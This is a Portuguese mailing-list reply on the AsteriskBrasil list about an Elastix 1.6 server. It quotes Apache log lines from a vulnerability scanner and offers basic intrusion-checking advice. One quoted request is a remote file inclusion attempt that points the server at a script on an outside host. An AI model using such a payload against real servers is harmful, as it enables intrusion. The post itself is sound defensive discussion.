[AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6

[Alejandro Flores]

>> 72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] "GET /user/soapCaller.bs
>> HTTP/1.1" 302 305 "-" "Morfeus Fucking Scanner"
>> 72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] "GET
>> /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? HTTP/1.1"
>> 302 354 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

Na verdade na verdade esses logs só mostram um robozinho de scanner de
vulnerabilidades. Esses logs só mostram os caras procurando furo,
porém, não tem. Encontrei entradas iguais nos logs dos meus servers,
mas é só isso mesmo, algum manezão investigando tua máquina. Nesse
caso, claro.
Procure por aquivos estranhos no /tmp no /var/tmp, procure por
processos estranhos no caso de uma invasão.
No caso das ligações pra itália que você falou, eles ligaram
autenticados ou anonimos?

-- 
Abraço,
Alejandro Flores
http://www.triforsec.com.br/